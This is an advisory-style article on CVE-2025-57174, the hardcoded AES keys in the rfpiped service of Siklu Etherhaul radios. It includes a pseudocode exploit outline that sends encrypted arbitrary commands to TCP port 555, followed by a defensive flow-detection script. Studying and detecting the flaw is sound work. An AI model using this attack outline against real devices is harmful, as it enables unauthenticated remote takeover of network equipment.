Overview
This article examines CVE-2025-57174, a critical vulnerability discovered in Siklu Communications Etherhaul 8010TX and 1200FX devices. It affects Firmware 7.4.0 through 10.7.3 and possibly other previous versions, and potentially exposes these devices to system compromise or data leakage. Given the widespread use of these devices in various industries, the implications are far-reaching and call for immediate attention and action.
Vulnerability Summary
CVE ID: CVE-2025-57174
Severity: Critical (9.8 CVSS score)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise or data leakage
Affected Products
| Product | Affected Versions |
| --- | --- |
| Siklu Communications Etherhaul 8010TX | Firmware 7.4.0 through 10.7.3 |
| Siklu Communications Etherhaul 1200FX | Firmware 7.4.0 through 10.7.3 |
How the Exploit Works
The vulnerability arises from the `rfpiped` service listening on TCP port 555, which uses static AES encryption keys hardcoded into the binary. These keys are identical across all devices, making it possible for attackers to craft and send encrypted packets that execute arbitrary commands without authentication. This method of attack bypasses the need for user interaction and does not require any privileges, making it particularly dangerous.
Conceptual Example Code
Given the nature of this vulnerability, an attacker could exploit it by crafting an encrypted packet containing a malicious command using the hardcoded AES encryption key. Here is a conceptual example, represented in Python-like pseudocode:
```python
import socket
import AES
TCP_IP = 'target_IP'
TCP_PORT = 555
BUFFER_SIZE = 1024
# The hardcoded AES key
AES_KEY = 'hardcoded_key'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
# Crafting malicious command
command = 'arbitrary_command'
encrypted_command = AES.encrypt(command, AES_KEY)
s.send(encrypted_command)
data = s.recv(BUFFER_SIZE)
s.close()
print("received data:", data)
```
In this example, a TCP connection is established with the target device on port 555. A command is then encrypted using the hardcoded AES key and sent to the device. Because the device holds the same hardcoded key, it would decrypt and execute the command, thereby compromising the system.
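For defenders, the following added example (not part of the original advisory) flags network flows that reach TCP port 555 on devices in the listed firmware range from outside a management network. The inventory, flow tuples and management subnet are constructed assumptions; adapt them to your own asset and flow-log sources.

```python
import ipaddress

RFPIPED_PORT = 555                       # rfpiped listener named in the advisory
AFFECTED_MODELS = {"8010TX", "1200FX"}   # Etherhaul models listed as affected
FIRST_BAD, LAST_BAD = (7, 4, 0), (10, 7, 3)
# Note: the advisory says earlier versions are possibly affected too;
# lower FIRST_BAD if you want to treat them as in scope.

def parse_version(text):
    """'10.7.3' -> (10, 7, 3); tuples avoid the string bug where '10.x' < '7.x'."""
    return tuple(int(part) for part in text.strip().split("."))

def is_affected(model, firmware):
    return model in AFFECTED_MODELS and FIRST_BAD <= parse_version(firmware) <= LAST_BAD

def suspicious_flows(flows, inventory, mgmt_nets):
    """Return (src, dst) for TCP/555 flows to affected devices from outside mgmt_nets."""
    allowed = [ipaddress.ip_network(n) for n in mgmt_nets]
    hits = []
    for src, dst, proto, dport in flows:
        device = inventory.get(dst)
        if device is None or proto != "tcp" or dport != RFPIPED_PORT:
            continue
        if not is_affected(*device):
            continue
        if any(ipaddress.ip_address(src) in net for net in allowed):
            continue
        hits.append((src, dst))
    return hits

# Constructed sample data (hypothetical, not from the advisory)
INVENTORY = {
    "10.20.0.11": ("8010TX", "10.7.3"),
    "10.20.0.12": ("1200FX", "7.4.0"),
    "10.20.0.13": ("8010TX", "10.8.0"),   # outside the listed range
}
MGMT_NETS = ["10.99.0.0/24"]
FLOWS = [
    ("10.99.0.5", "10.20.0.11", "tcp", 555),     # management host: allowed
    ("192.0.2.44", "10.20.0.11", "tcp", 555),    # outside management: flagged
    ("192.0.2.44", "10.20.0.12", "tcp", 443),    # different port: ignored
    ("198.51.100.7", "10.20.0.12", "tcp", 555),  # outside management: flagged
    ("198.51.100.7", "10.20.0.13", "tcp", 555),  # firmware outside listed range
]

if __name__ == "__main__":
    for src, dst in suspicious_flows(FLOWS, INVENTORY, MGMT_NETS):
        print(f"ALERT {src} -> {dst}:{RFPIPED_PORT} (rfpiped, affected firmware)")
```

Because the keys are identical across devices, any flow flagged here should be treated as unauthenticated access to the service, not as a connection protected by encryption.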